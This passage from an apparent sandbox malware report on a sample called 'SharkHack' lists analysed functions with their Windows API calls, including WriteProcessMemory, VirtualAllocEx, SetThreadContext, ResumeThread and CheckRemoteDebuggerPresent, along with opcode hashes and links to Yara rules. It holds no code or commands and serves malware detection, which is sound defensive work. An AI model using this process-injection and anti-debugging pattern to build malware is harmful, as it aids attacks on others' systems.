                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 657bea90205d85551b73114c76bf6225d6ced5e54d3c66eeec3c60bb38916b8c
                                                                                                          • Instruction ID: 23e1193dc8c414d80b941c8ddc56721064c3cb608608cce36dd46df65bd84dab
                                                                                                          • Opcode Fuzzy Hash: 657bea90205d85551b73114c76bf6225d6ced5e54d3c66eeec3c60bb38916b8c
                                                                                                          • Instruction Fuzzy Hash: BD51707190D3D48FCB12CB78D854799BFB0AF07224F2941EBD595EB2A3D2385909C7A2
                                                                                                          Function 059D1678 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 059D16FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: c24fe77ffc3d652cfa90e8f2ace2eabdc3dbb5a4f6245bb9523fde6ba616588c
                                                                                                          • Instruction ID: c594089bd7a0d8d8f6d2a71c081cb3b64968319b3732ec9e23404f224368bcdc
                                                                                                          • Opcode Fuzzy Hash: c24fe77ffc3d652cfa90e8f2ace2eabdc3dbb5a4f6245bb9523fde6ba616588c
                                                                                                          • Instruction Fuzzy Hash: 3C3167719042099FCB10DFA9C884BEEFBF4FF48364F14C42AD859A7291C7789985CBA5
                                                                                                          Function 059D24A0 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059D2538
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: bb9ed138ebb641b21b6273aa735a90315e296a2627cd523d7ef74bc86c802f0a
                                                                                                          • Instruction ID: 316b4fa9262264e8d1a29a3546e29451572a3a7ae5f6be4499341f61f97ce9d8
                                                                                                          • Opcode Fuzzy Hash: bb9ed138ebb641b21b6273aa735a90315e296a2627cd523d7ef74bc86c802f0a
                                                                                                          • Instruction Fuzzy Hash: D22126B69002599FCF10DFA9C985BEEBBF5FB48320F10842AE919A7250C7789544CBA4
                                                                                                          Function 059D24A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059D2538
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 1bf7cf115b2b01a4144834bd38b91913d1d5eef8f9f1ea94760b38813e125eeb
                                                                                                          • Instruction ID: 24a57ea31babaf0e3011cdf9eec9ba0d88d6b99dabb0b555776cf30772f55d0f
                                                                                                          • Opcode Fuzzy Hash: 1bf7cf115b2b01a4144834bd38b91913d1d5eef8f9f1ea94760b38813e125eeb
                                                                                                          • Instruction Fuzzy Hash: 3A2146B59003499FCB10DFA9C981BDEBBF5FF48310F108429E919A7250C7789944CBA4
                                                                                                          Function 06020939 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060209B7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                                          • String ID:
                                                                                                          • API String ID: 3662101638-0
                                                                                                          • Opcode ID: 157ac2b3f075b9ef96670b4cd7ed9570f11be33385f05a67fbf9fc9aea7a2a54
                                                                                                          • Instruction ID: 5ca3301a9554048d655d5f0e6be13731539d04ea9105211560349f5ebcfcc941
                                                                                                          • Opcode Fuzzy Hash: 157ac2b3f075b9ef96670b4cd7ed9570f11be33385f05a67fbf9fc9aea7a2a54
                                                                                                          • Instruction Fuzzy Hash: CA2169B2C002598FDB10CF9AD844BEEBBF4EF49320F14842AE855A7251D738A944CFA1
                                                                                                          Function 059D2940 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 059D29BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 8c27db9994df4f7fe483936208b7d407a8ad22c443ad232aa2155baac88ebfb0
                                                                                                          • Instruction ID: d693724f46db475bd796f3a2a714e4ab9fc2f7d471295481450b9ca371fadb4a
                                                                                                          • Opcode Fuzzy Hash: 8c27db9994df4f7fe483936208b7d407a8ad22c443ad232aa2155baac88ebfb0
                                                                                                          • Instruction Fuzzy Hash: F62159B18002499FCB10DFAAC444BEEFBF4EF88320F108429D459A7250C7789545CFA5
                                                                                                          Function 059D312B Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D31AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 219094db600a3355a509e810e9c7d00de492623ef35eeb8bc90e85fa05e5db94
                                                                                                          • Instruction ID: bbbb05726e0e9d2b0a6ba53e7ab067ec5d4ad3daccd0b89c9115d1d331e92594
                                                                                                          • Opcode Fuzzy Hash: 219094db600a3355a509e810e9c7d00de492623ef35eeb8bc90e85fa05e5db94
                                                                                                          • Instruction Fuzzy Hash: 232137B19042099FDB10DFAAC9857EEFBF4EB48324F14C42AD459A7240CB78A944CFA5
                                                                                                          Function 059D3130 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D31AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 6999fa6009e3a6b553cf4f480cdf4bdb990ef41f0b604a88791f0d13480f5066
                                                                                                          • Instruction ID: f09b37fca9aa15297bc813db36da6fceb81b49343e919c1bb651e78abc086b60
                                                                                                          • Opcode Fuzzy Hash: 6999fa6009e3a6b553cf4f480cdf4bdb990ef41f0b604a88791f0d13480f5066
                                                                                                          • Instruction Fuzzy Hash: C52137B19002099FDB10DFAAC5857EEFBF4AB48324F10C429D459A7240CB78A944CFA5
                                                                                                          Function 059D1680 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 059D16FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 252e900ba7e6b34e856b97394c987d9515e09409d1020418c6ee152c553519bc
                                                                                                          • Instruction ID: a06071733cf53c29a8675412c6c496c735226cb9d02d01df9c7b2a538529356b
                                                                                                          • Opcode Fuzzy Hash: 252e900ba7e6b34e856b97394c987d9515e09409d1020418c6ee152c553519bc
                                                                                                          • Instruction Fuzzy Hash: 2D2137B19003098FDB10DFAAC4857EEFBF4AB48324F148429D459A7251C778A984CFA4
                                                                                                          Function 08A0FC48 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08A0FCC3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: e4e1de4e27a2c609786e27a116a9a599d1c241f62546e3fec0707c5e62001894
                                                                                                          • Instruction ID: 00dd51e85e002d5404eb7ed40e8b40fadab5a40a621b35890862f9e0fe2d33d3
                                                                                                          • Opcode Fuzzy Hash: e4e1de4e27a2c609786e27a116a9a599d1c241f62546e3fec0707c5e62001894
                                                                                                          • Instruction Fuzzy Hash: 422147B5D002499FCB20DF9AD484BDEFBF4EB48320F10842AE958A3280C738A544CFA5
                                                                                                          Function 089C8A28 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 4dc13661653a81c67f3c3525c854333102d619454a5e85776780741558b53385
                                                                                                          • Instruction ID: 0eab8db22600af2db72e12520325bfa564a35f38d2ef9b3ceb844bc70d232692
                                                                                                          • Opcode Fuzzy Hash: 4dc13661653a81c67f3c3525c854333102d619454a5e85776780741558b53385
                                                                                                          • Instruction Fuzzy Hash: A521E5B59002499FCB10DF9AC484BDEFBF4FF48320F148429E958A7251D778A544CFA5
                                                                                                          Function 059D2948 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 059D29BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 51eddd81c77d4dcc8e34923e8768c0ef487fe4610f43de05af96e68256e50fc2
                                                                                                          • Instruction ID: cef452a065928e288e2e816033690de96e16f1e498e80f31288524f5d756b086
                                                                                                          • Opcode Fuzzy Hash: 51eddd81c77d4dcc8e34923e8768c0ef487fe4610f43de05af96e68256e50fc2
                                                                                                          • Instruction Fuzzy Hash: 812115B18002499FDB10DFAAC544BEEFBF5EF88320F10842AD959A7250C778A944DFA5
                                                                                                          Function 059D1D60 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059D1DD6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 97103c76f526b18c87635ac813b972c7ae82877d240e4c899a4b68e4e056407b
                                                                                                          • Instruction ID: e923bec23cdd8db320dbb66b4dd7dcb490a61c317c65113b8eee61fc5ba34c79
                                                                                                          • Opcode Fuzzy Hash: 97103c76f526b18c87635ac813b972c7ae82877d240e4c899a4b68e4e056407b
                                                                                                          • Instruction Fuzzy Hash: 6A1147B69002499FCB20DFAAD844BEFFFF5EB48324F108429E559A7250C735A544DBA4
                                                                                                          Function 08EFC118 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 08EFC188
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 7a6272ccbcbf2eedb963d84bc528546a7263e4fee016e7f176c54dd15cfbfe2d
                                                                                                          • Instruction ID: e2b5739bb9db222fcbe71de3bd40cae1c5ec5e1500485c7390c96c1d4f61de93
                                                                                                          • Opcode Fuzzy Hash: 7a6272ccbcbf2eedb963d84bc528546a7263e4fee016e7f176c54dd15cfbfe2d
                                                                                                          • Instruction Fuzzy Hash: 4F1147B2C006699BCB10CF9AC5447DEFBF4EF48320F20812AD818A7241D338A954CFA5
                                                                                                          Function 089C8A30 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 49118f3147578f03d1f7fc00320e95c122a59281b71aa763669bfffd3301e1b1
                                                                                                          • Instruction ID: cd9bcb1ed67c71e535a14d4cc50e0af92295451ab7072388028caddc53506c2a
                                                                                                          • Opcode Fuzzy Hash: 49118f3147578f03d1f7fc00320e95c122a59281b71aa763669bfffd3301e1b1
                                                                                                          • Instruction Fuzzy Hash: 5821E4B59002499FCB10DF9AC884BDEFBF8FB48320F108429E958A7251D379A644CFA5
                                                                                                          Function 08A0FC50 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08A0FCC3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 467a92490426cdfd0a3d2f506f472bdd98f1fe69059eac5b7cf1ae718dab3a25
                                                                                                          • Instruction ID: 104d0f2d3cfcac4e50eb6fe0ef7814ba69f1f3e3f69e01720aa62f20ffddcc61
                                                                                                          • Opcode Fuzzy Hash: 467a92490426cdfd0a3d2f506f472bdd98f1fe69059eac5b7cf1ae718dab3a25
                                                                                                          • Instruction Fuzzy Hash: 742114B5900249DFCB10DF9AC484BDEFBF4FB48320F10842AE958A7650D778A544CFA5
                                                                                                          Function 089C8ADF Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 72d76db10df55b8cd7e8144939bf873309664e8a245fc1c3aeb5c32ed945f8b0
                                                                                                          • Instruction ID: 1acdc93a01244ef911e1d4b923d223c4b5f3fecbdace1b9fb53f0fda0272ee6c
                                                                                                          • Opcode Fuzzy Hash: 72d76db10df55b8cd7e8144939bf873309664e8a245fc1c3aeb5c32ed945f8b0
                                                                                                          • Instruction Fuzzy Hash: 1D11E1B1900249DFCB11DFA8C804BEEBFF0AF44324F14C1AAE994672A1C3359645EB66
                                                                                                          Function 059D1D68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059D1DD6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 291a757044cea8f55a5ab48a5a75b009bc7b3822d9a2449edde9de10c09d0e57
                                                                                                          • Instruction ID: ea20cb7df347d1e59dd44a254c3fffa60facf197fed291eb4cfb26b24d36ec1a
                                                                                                          • Opcode Fuzzy Hash: 291a757044cea8f55a5ab48a5a75b009bc7b3822d9a2449edde9de10c09d0e57
                                                                                                          • Instruction Fuzzy Hash: 4D1137B29002499FCB10DFAAC844BDEFFF5EF88320F248419E559A7250C775A544CFA4
                                                                                                          Function 06020FC8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DebugOutputString
                                                                                                          • String ID:
                                                                                                          • API String ID: 1166629820-0
                                                                                                          • Opcode ID: b9139f1f28c8d72db74a620e9e1d6ec043717eada7b7a0ae2c19ec1d86319976
                                                                                                          • Instruction ID: 7350d027a8ed9771d3cf53aa193c2c59811d555b4dd899aaeac800a5a1be2f38
                                                                                                          • Opcode Fuzzy Hash: b9139f1f28c8d72db74a620e9e1d6ec043717eada7b7a0ae2c19ec1d86319976
                                                                                                          • Instruction Fuzzy Hash: B31114B1D0065A9FCB54CF9AD984BDEFBB4FF48320F10816AD918A7640C374A544CFA4
                                                                                                          Function 059D3393 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: d3ab972c2e50908b3dca10126d4f4433c0ff21dbda2a58648f9b8f7f3a54fb62
                                                                                                          • Instruction ID: e51e276f26521c02238875eb6a8cb66e4e97bc93a5a13b4910fe1b3bbe15b847
                                                                                                          • Opcode Fuzzy Hash: d3ab972c2e50908b3dca10126d4f4433c0ff21dbda2a58648f9b8f7f3a54fb62
                                                                                                          • Instruction Fuzzy Hash: 0B1128B19042488BDB20DFAAC4457DEFBF4EB88324F248829D559A7250CB79A544CBA5
                                                                                                          Function 06020FD0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DebugOutputString
                                                                                                          • String ID:
                                                                                                          • API String ID: 1166629820-0
                                                                                                          • Opcode ID: a900315215d45dcf7cbd828b5fc117abab4ff31e769fb5dda6a947ab6d8c7f49
                                                                                                          • Instruction ID: 984357cdc36f4d26089b05405324bc031b7ab83f041244acf755626ca1a80cb4
                                                                                                          • Opcode Fuzzy Hash: a900315215d45dcf7cbd828b5fc117abab4ff31e769fb5dda6a947ab6d8c7f49
                                                                                                          • Instruction Fuzzy Hash: 341102B1D0065A9BCB14DF9AD884BDEFBF4FF48320F10816AD918A7240C778A954CFA5
                                                                                                          Function 059D3398 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: d5ccad03f37976435903a7076bb69278ca14d3c6255aa6c9e8e14c7f38286a8d
                                                                                                          • Instruction ID: 3ade449bcf8535cfa68245bd13787edcf42f5180ec76b48d3f16a4a6cac803f8
                                                                                                          • Opcode Fuzzy Hash: d5ccad03f37976435903a7076bb69278ca14d3c6255aa6c9e8e14c7f38286a8d
                                                                                                          • Instruction Fuzzy Hash: D21128B19042488BCB20DFAAC4457DEFBF4EB88324F208829D459A7250CA79A544CBA5
                                                                                                          Function 059D20D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 059D4D95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: f9a580b947eac86c31877c9641d251781ed29ced2b40e929e65a85e1e201785a
                                                                                                          • Instruction ID: e9da27b434413467ae6f74247dea146f67cad9e22138a971a9d50668d611e599
                                                                                                          • Opcode Fuzzy Hash: f9a580b947eac86c31877c9641d251781ed29ced2b40e929e65a85e1e201785a
                                                                                                          • Instruction Fuzzy Hash: 3E11F2B5800349DFCB10DF9AC449BDEFBF8EB58320F208859E958A7200C3B5A944CFA1
                                                                                                          Function 059D4D30 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 059D4D95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: aefdb4ac6ce783efed2b9a4c55f1ee3adf402ae6626087f601cbbae1a1dc137b
                                                                                                          • Instruction ID: 5aeb0a50225ee791c6d217c75a10ee911e2ce240f9a0bdf27e1c52c6d933df7b
                                                                                                          • Opcode Fuzzy Hash: aefdb4ac6ce783efed2b9a4c55f1ee3adf402ae6626087f601cbbae1a1dc137b
                                                                                                          • Instruction Fuzzy Hash: F011E0B5800348DFCB20DF99D445BDEBFF8EB58320F20841AD968A7211C379A944CFA1
                                                                                                          Function 0602106C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OutputDebugStringW.KERNELBASE(00000000), ref: 06021040
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DebugOutputString
                                                                                                          • String ID:
                                                                                                          • API String ID: 1166629820-0
                                                                                                          • Opcode ID: 725f70eee75104832d3839be58111176ac57de72be43c4af909e809766a5676b
                                                                                                          • Instruction ID: d20322a1b8a25d20e31ef0bb6ad51fa1881774a3041a9ada4b7bd4d59297ca0c
                                                                                                          • Opcode Fuzzy Hash: 725f70eee75104832d3839be58111176ac57de72be43c4af909e809766a5676b
                                                                                                          • Instruction Fuzzy Hash: 500149F2C492E28EDB508B99C4883D8BFB0FF16354F0980C6C244A7151C3B94556CFA1
                                                                                                          Function 0874FB70 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q
                                                                                                          • API String ID: 0-1614139903
                                                                                                          • Opcode ID: e4bdde8ccbb6c0faa475a8a7929ab963c32abba7933dad1342fe7259e3b1c6a5
                                                                                                          • Instruction ID: 1aeb202e0a22e7205647350136d99ef6a9c209e1d6b656b81ba4d79a7c4c6758
                                                                                                          • Opcode Fuzzy Hash: e4bdde8ccbb6c0faa475a8a7929ab963c32abba7933dad1342fe7259e3b1c6a5
                                                                                                          • Instruction Fuzzy Hash: A9719034B04216CFC704AFB9E49456EBBF2FB88205B44842AE545D7369EF38DD46CB62
                                                                                                          Function 08741D40 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
